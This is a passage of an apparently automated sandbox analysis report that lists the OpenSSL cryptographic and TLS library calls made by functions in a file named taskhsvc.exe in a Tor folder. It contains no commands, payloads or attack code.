            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC3C0 CRYPTO_malloc,ERR_put_error,__stack_chk_fail,86_2_6CDCC3C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB8445 CRYPTO_realloc,86_2_6CDB8445
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB475 EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_add_lock,CRYPTO_add_lock,86_2_6CDCB475
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE46C CRYPTO_free,86_2_6CDAE46C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAC460 HMAC_CTX_init,EVP_CIPHER_CTX_init,EVP_MD_size,EVP_CIPHER_CTX_iv_length,memcmp,EVP_sha256,HMAC_Init_ex,EVP_aes_128_cbc,EVP_DecryptInit_ex,HMAC_Update,HMAC_Final,HMAC_CTX_cleanup,CRYPTO_memcmp,EVP_CIPHER_CTX_cleanup,HMAC_CTX_cleanup,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,EVP_CIPHER_CTX_cleanup,d2i_SSL_SESSION,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,__stack_chk_fail,EC_curve_nist2nid,OBJ_sn2nid,OBJ_ln2nid,__stack_chk_fail,strchr,OBJ_sn2nid,OBJ_ln2nid,__stack_chk_fail,86_2_6CDAC460
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD52D8 X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,ERR_put_error,RSA_flags,ERR_put_error,EVP_PKEY_free,86_2_6CDD52D8
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD5419 EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,86_2_6CDD5419
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE41C CRYPTO_free,86_2_6CDAE41C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0320 SSL_CTX_get_info_callback,__stack_chk_fail,SSL_CTX_set_client_cert_cb,__stack_chk_fail,SSL_CTX_get_client_cert_cb,__stack_chk_fail,SSL_CTX_set_client_cert_engine,ENGINE_init,ENGINE_get_ssl_client_cert_function,ERR_put_error,ERR_put_error,ENGINE_finish,__stack_chk_fail,SSL_CTX_set_cookie_generate_cb,__stack_chk_fail,SSL_CTX_set_cookie_verify_cb,__stack_chk_fail,PEM_read_bio_SSL_SESSION,PEM_ASN1_read_bio,__stack_chk_fail,PEM_read_SSL_SESSION,PEM_ASN1_read,__stack_chk_fail,PEM_write_bio_SSL_SESSION,PEM_ASN1_write_bio,__stack_chk_fail,PEM_write_SSL_SESSION,PEM_ASN1_write,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,86_2_6CDD0320
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8402 CRYPTO_lock,86_2_6CDA8402
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC400 SSL_CONF_CTX_set1_prefix,BUF_strdup,CRYPTO_free,strlen,CRYPTO_free,__stack_chk_fail,SSL_CONF_CTX_set_ssl,__stack_chk_fail,SSL_CONF_CTX_set_ssl_ctx,__stack_chk_fail,SSL_set_info_callback,__stack_chk_fail,SSL_shutdown,CRYPTO_free,SSL_free,__stack_chk_fail,strlen,BIO_write,__stack_chk_fail,BIO_clear_flags,SSL_read,SSL_get_error,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,time,SSL_renegotiate,SSL_renegotiate,__stack_chk_fail,BIO_clear_flags,SSL_write,SSL_get_error,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,time,SSL_renegotiate,SSL_renegotiate,__stack_chk_fail,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,SSL_get_rbio,BIO_push,CRYPTO_add_lock,__stack_chk_fail,BIO_set_flags,BIO_callback_ctrl,86_2_6CDDC400
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD93432 CRYPTO_free,86_2_6CD93432
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD6430 SSL_CTX_use_certificate,X509_get_pubkey,EVP_PKEY_copy_parameters,ERR_clear_error,X509_check_private_key,EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,ERR_put_error,RSA_flags,ERR_put_error,EVP_PKEY_free,86_2_6CDD6430
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC0000 SSL_get_wbio,BIO_ctrl,EVP_CIPHER_CTX_flags,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,SSL_get_wbio,BIO_ctrl,SSL_get_wbio,BIO_ctrl,OpenSSLDie,SSL_get_wbio,BIO_ctrl,SSL_ctrl,OpenSSLDie,OpenSSLDie,EVP_CIPHER_block_size,__stack_chk_fail,pqueue_peek,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,pqueue_pop,CRYPTO_free,CRYPTO_free,CRYPTO_free,pitem_free,ERR_put_error,ERR_put_error,ERR_put_error,pqueue_find,CRYPTO_malloc,pitem_new,pqueue_insert,OpenSSLDie,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,ERR_put_error,__stack_chk_fail,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,CRYPTO_malloc,CRYPTO_free,86_2_6CDC0000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBC5C9 CRYPTO_free,ERR_put_error,86_2_6CDBC5C9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC5C0 sk_num,sk_value,X509_STORE_CTX_init,X509_STORE_CTX_set_flags,X509_STORE_CTX_set_ex_data,X509_STORE_CTX_set_default,X509_STORE_CTX_get0_param,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_STORE_CTX_cleanup,ERR_put_error,X509_verify_cert,CRYPTO_lock,CRYPTO_lock,X509_STORE_CTX_get_ex_new_index,__stack_chk_fail,86_2_6CDCC5C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA590 SSL_CTX_get_ex_data,CRYPTO_get_ex_data,86_2_6CDCA590
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAD5BB __stack_chk_fail,CRYPTO_free,__stack_chk_fail,__stack_chk_fail,86_2_6CDAD5BB
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD929B0 EVP_MD_CTX_init,BN_num_bits,BN_num_bits,EVP_MD_CTX_set_flags,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,RSA_sign,EVP_MD_CTX_cleanup,DHparams_dup,DH_generate_key,BN_num_bits,BN_num_bits,BN_num_bits,BUF_MEM_grow_clean,BN_bn2bin,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_SignFinal,BN_num_bits,EC_KEY_dup,EC_KEY_get0_public_key,EC_KEY_get0_private_key,EC_KEY_generate_key,EC_KEY_get0_group,EC_KEY_get0_public_key,EC_KEY_get0_private_key,EC_GROUP_get_degree,EC_GROUP_get_curve_name,EC_KEY_get0_public_key,EC_POINT_point2oct,CRYPTO_malloc,BN_CTX_new,EC_KEY_get0_public_key,EC_POINT_point2oct,BN_CTX_free,strlen,strlen,strlen,strncpy,strlen,CRYPTO_free,EVP_PKEY_size,ERR_put_error,CRYPTO_free,BN_CTX_free,EVP_MD_CTX_cleanup,strlen,RSA_up_ref,ERR_put_error,EC_KEY_new_by_curve_name,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,ERR_put_error,86_2_6CD929B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC55B0 SSL_accept,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,__stack_chk_fail,86_2_6CDC55B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE5AC ERR_put_error,CRYPTO_add_lock,BUF_strdup,CRYPTO_lock,CRYPTO_lock,SSL_has_matching_session_id,ERR_put_error,CRYPTO_add_lock,86_2_6CDCE5AC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD65A9 EVP_PKEY_free,X509_free,CRYPTO_add_lock,EVP_PKEY_free,ERR_clear_error,86_2_6CDD65A9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF55C CRYPTO_add_lock,86_2_6CDCF55C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB355C CRYPTO_malloc,EVP_sha256,EVP_md5,EVP_sha1,EVP_sha224,EVP_sha384,EVP_sha512,86_2_6CDB355C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCA540 SSL_CTX_set_ex_data,CRYPTO_set_ex_data,86_2_6CDCA540
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB6509 OPENSSL_cleanse,CRYPTO_free,86_2_6CDB6509
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB3380 CRYPTO_free,CRYPTO_malloc,EVP_sha256,EVP_md5,EVP_sha1,EVP_sha224,EVP_sha384,EVP_sha512,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,__stack_chk_fail,CRYPTO_free,ERR_put_error,ERR_put_error,86_2_6CDB3380
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE500 CRYPTO_add_lock,86_2_6CDCE500
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD3530 SSL_COMP_add_compression_method,CRYPTO_mem_ctrl,CRYPTO_malloc,sk_find,sk_push,CRYPTO_mem_ctrl,86_2_6CDD3530
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE529 CRYPTO_free,86_2_6CDAE529
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA8522 CRYPTO_lock,86_2_6CDA8522
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9C6DC CRYPTO_free,86_2_6CD9C6DC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC16D2 OpenSSLDie,pitem_new,pqueue_insert,OpenSSLDie,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_destroy,86_2_6CDC16D2
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDBA6C0 CRYPTO_free,CRYPTO_free,pitem_free,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,pqueue_pop,CRYPTO_free,CRYPTO_free,pitem_free,pqueue_pop,pitem_free,pqueue_pop,pitem_free,pqueue_pop,__stack_chk_fail,__stack_chk_fail,CRYPTO_malloc,pqueue_new,pqueue_new,pqueue_new,pqueue_new,pqueue_new,pqueue_free,pqueue_free,pqueue_free,pqueue_free,pqueue_free,CRYPTO_free,__stack_chk_fail,pqueue_pop,86_2_6CDBA6C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC46C0 SSL_free,CRYPTO_add_lock,__stack_chk_fail,86_2_6CDC46C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC56E0 SSL_connect,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,__stack_chk_fail,86_2_6CDC56E0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC4680 SSL_certs_clear,X509_free,EVP_PKEY_free,sk_pop_free,CRYPTO_free,86_2_6CDC4680
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDC400 SSL_CONF_CTX_set1_prefix,BUF_strdup,CRYPTO_free,strlen,CRYPTO_free,__stack_chk_fail,SSL_CONF_CTX_set_ssl,__stack_chk_fail,SSL_CONF_CTX_set_ssl_ctx,__stack_chk_fail,SSL_set_info_callback,__stack_chk_fail,SSL_shutdown,CRYPTO_free,SSL_free,__stack_chk_fail,strlen,BIO_write,__stack_chk_fail,BIO_clear_flags,SSL_read,SSL_get_error,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,time,SSL_renegotiate,SSL_renegotiate,__stack_chk_fail,BIO_clear_flags,SSL_write,SSL_get_error,BIO_set_flags,BIO_set_flags,BIO_set_flags,BIO_set_flags,time,SSL_renegotiate,SSL_renegotiate,__stack_chk_fail,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,SSL_get_rbio,BIO_push,CRYPTO_add_lock,__stack_chk_fail,BIO_set_flags,BIO_callback_ctrl,86_2_6CDDC400
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB26A9 CRYPTO_free,CRYPTO_malloc,86_2_6CDB26A9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F6A0 CRYPTO_free,strlen,BUF_strdup,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CD9F6A0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA19D0 __stack_chk_fail,COMP_CTX_free,COMP_CTX_new,EVP_CIPHER_CTX_cleanup,COMP_CTX_free,COMP_CTX_new,EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,EVP_MD_CTX_init,EVP_CipherInit_ex,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_CTX_cleanup,ERR_put_error,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,CRYPTO_malloc,EVP_CIPHER_CTX_init,CRYPTO_malloc,EVP_CIPHER_CTX_init,CRYPTO_malloc,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_MD_size,EVP_CIPHER_key_length,EVP_CIPHER_iv_length,OPENSSL_cleanse,CRYPTO_free,CRYPTO_malloc,EVP_MD_CTX_init,EVP_MD_CTX_set_flags,EVP_MD_CTX_init,EVP_sha1,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_md5,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,ERR_put_error,ERR_put_error,OPENSSL_cleanse,EVP_MD_CTX_cleanup,EVP_MD_CTX_cleanup,ERR_put_error,__stack_chk_fail,EVP_DigestFinal_ex,86_2_6CDA19D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD36A7 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,86_2_6CDD36A7
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9A659 X509_get_pubkey,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,RAND_bytes,EVP_MD_CTX_create,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_destroy,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_free,86_2_6CD9A659
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA0650 __stack_chk_fail,CRYPTO_malloc,CRYPTO_free,86_2_6CDA0650
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD3657 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,86_2_6CDD3657
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB1657 strlen,CRYPTO_free,CRYPTO_malloc,86_2_6CDB1657
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD2649 sk_push,CRYPTO_free,sk_dup,sk_free,sk_free,sk_set_cmp_func,sk_sort,86_2_6CDD2649
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD96647 RAND_bytes,EVP_aes_128_cbc,EVP_EncryptInit_ex,EVP_sha256,HMAC_Init_ex,86_2_6CD96647
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCF60E CRYPTO_add_lock,time,86_2_6CDCF60E
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA0609 __stack_chk_fail,CONF_parse_list,CRYPTO_malloc,CRYPTO_free,86_2_6CDA0609
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE639 ERR_put_error,CRYPTO_add_lock,86_2_6CDCE639
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE63C CRYPTO_free,86_2_6CDAE63C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9A180 RAND_bytes,RSA_public_encrypt,OPENSSL_cleanse,EC_KEY_get0_group,EC_KEY_get0_public_key,EC_KEY_new,EC_KEY_set_group,EC_KEY_generate_key,EC_GROUP_get_degree,ECDH_compute_key,EC_KEY_get0_public_key,EC_POINT_point2oct,CRYPTO_malloc,BN_CTX_new,EC_KEY_get0_public_key,EC_POINT_point2oct,BN_CTX_free,CRYPTO_free,EC_KEY_free,EVP_PKEY_free,EVP_PKEY_get1_DH,DH_compute_key,DH_free,X509_get_pubkey,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,RAND_bytes,EVP_MD_CTX_create,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_destroy,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,BUF_strdup,SRP_generate_client_master_secret,ERR_put_error,BN_CTX_free,EVP_PKEY_free,X509_get_pubkey,EVP_PKEY_free,DHparams_dup,DH_generate_key,ERR_put_error,DH_free,BN_num_bits,BN_bn2bin,ERR_put_error,BN_CTX_free,CRYPTO_free,EC_KEY_free,strlen,ERR_put_error,OPENSSL_cleanse,OPENSSL_cleanse,X509_get_pubkey,ERR_put_error,ERR_put_error,BN_CTX_free,DH_free,ERR_put_error,X509_get_pubkey,EVP_PKEY_get1_DH,EVP_PKEY_free,ERR_put_error,EVP_PKEY_free,memmove,CRYPTO_free,BUF_strdup,CRYPTO_free,BUF_strdup,OPENSSL_cleanse,OPENSSL_cleanse,EVP_MD_CTX_destroy,ERR_put_error,EVP_PKEY_CTX_free,ERR_put_error,BN_CTX_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,ERR_put_error,ERR_put_error,ERR_put_error,BN_CTX_free,ERR_put_error,ERR_put_error,86_2_6CD9A180
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE62C CRYPTO_free,86_2_6CDAE62C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDADB40 ERR_put_error,__stack_chk_fail,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,CONF_parse_list,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,__stack_chk_fail,EC_KEY_get0_group,EC_GROUP_method_of,EC_METHOD_get_field_type,EC_GROUP_get_curve_name,ERR_put_error,EC_GROUP_get_curve_name,__stack_chk_fail,86_2_6CDADB40
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC37CE BUF_MEM_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,EVP_CIPHER_CTX_cleanup,CRYPTO_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_destroy,EVP_MD_CTX_destroy,CRYPTO_free,SSL_SESSION_free,ERR_put_error,86_2_6CDC37CE
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA57EC EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_CIPHER_CTX_flags,CRYPTO_memcmp,ERR_put_error,86_2_6CDA57EC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F789 __stack_chk_fail,SSL_state,CRYPTO_malloc,RAND_bytes,RAND_bytes,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,CRYPTO_malloc,RAND_bytes,RAND_bytes,CRYPTO_free,ERR_put_error,ERR_put_error,86_2_6CD9F789
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9978C CRYPTO_malloc,86_2_6CD9978C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAC786 CRYPTO_free,ERR_clear_error,86_2_6CDAC786
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD97BC ERR_put_error,asn1_add_error,SSL_SESSION_free,ASN1_INTEGER_get,CRYPTO_free,asn1_const_Finish,ASN1_get_object,d2i_ASN1_OCTET_STRING,BUF_strndup,CRYPTO_free,d2i_ASN1_OCTET_STRING,ASN1_const_check_infinite_end,86_2_6CDD97BC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB37B0 CRYPTO_free,__stack_chk_fail,86_2_6CDB37B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA27AC OPENSSL_cleanse,CRYPTO_free,86_2_6CDA27AC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD9F759 CRYPTO_free,86_2_6CD9F759
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0779 CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,86_2_6CDD0779
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC3779 CRYPTO_free,CRYPTO_free,CRYPTO_free,sk_pop_free,sk_pop_free,CRYPTO_free,CRYPTO_free,sk_pop_free,CRYPTO_add_lock,CRYPTO_free,sk_free,CRYPTO_free,86_2_6CDC3779
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC376C CRYPTO_free,sk_free,CRYPTO_free,86_2_6CDC376C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA0762 CRYPTO_free,strlen,ERR_put_error,BUF_strdup,ERR_put_error,86_2_6CDA0762
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD9764 ERR_put_error,asn1_add_error,SSL_SESSION_free,ASN1_INTEGER_get,CRYPTO_free,asn1_const_Finish,ASN1_get_object,d2i_ASN1_OCTET_STRING,BUF_strndup,CRYPTO_free,d2i_ASN1_OCTET_STRING,ASN1_const_check_infinite_end,86_2_6CDD9764
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD96715 CRYPTO_free,EVP_CIPHER_CTX_cleanup,HMAC_CTX_cleanup,SSL_SESSION_free,86_2_6CD96715
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE710 SRP_generate_server_master_secret,SRP_Verify_A_mod_N,SRP_Calc_u,SRP_Calc_server_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,OPENSSL_cleanse,CRYPTO_free,BN_clear_free,BN_clear_free,__stack_chk_fail,86_2_6CDDE710
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC2712 CRYPTO_free,86_2_6CDC2712
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDD0700 CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,CRYPTO_mem_ctrl,sk_new,CRYPTO_malloc,COMP_zlib,sk_push,sk_sort,CRYPTO_mem_ctrl,CRYPTO_free,__stack_chk_fail,CRYPTO_malloc,CRYPTO_free,86_2_6CDD0700
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCE702 ERR_put_error,CRYPTO_add_lock,BUF_strdup,86_2_6CDCE702
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE0D9 CRYPTO_free,86_2_6CDAE0D9
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC70D0 SSL_set_alpn_protos,CRYPTO_free,CRYPTO_malloc,86_2_6CDC70D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB80C0 BUF_memdup,__stack_chk_fail,__stack_chk_fail,SSL_CTX_add_client_custom_ext,CRYPTO_realloc,86_2_6CDB80C0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE089 CRYPTO_free,86_2_6CDAE089
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCB0B0 CRYPTO_malloc,EVP_sha1,EVP_sha1,EVP_sha1,EVP_sha1,ERR_put_error,__stack_chk_fail,86_2_6CDCB0B0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDDE0AC ERR_put_error,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,86_2_6CDDE0AC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC7000 SSL_CTX_set_alpn_protos,CRYPTO_free,CRYPTO_malloc,86_2_6CDC7000
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDC4050 SSL_CTX_set_session_id_context,ERR_put_error,__stack_chk_fail,SSL_set_session_id_context,ERR_put_error,__stack_chk_fail,SSL_CTX_set_generate_session_id,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,SSL_set_generate_session_id,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,SSL_has_matching_session_id,86_2_6CDC4050
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDCC049 CRYPTO_add_lock,86_2_6CDCC049
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDAE04C CRYPTO_free,86_2_6CDAE04C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDB4079 CRYPTO_free,ERR_put_error,86_2_6CDB4079
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA5070 ERR_put_error,__stack_chk_fail,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_flags,EVP_CIPHER_CTX_flags,CRYPTO_memcmp,ERR_put_error,COMP_expand_block,ERR_put_error,ERR_put_error,OpenSSLDie,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,SSL_state,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,86_2_6CDA5070
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDA806C CRYPTO_lock,CRYPTO_lock,CRYPTO_malloc,ERR_put_error,86_2_6CDA806C
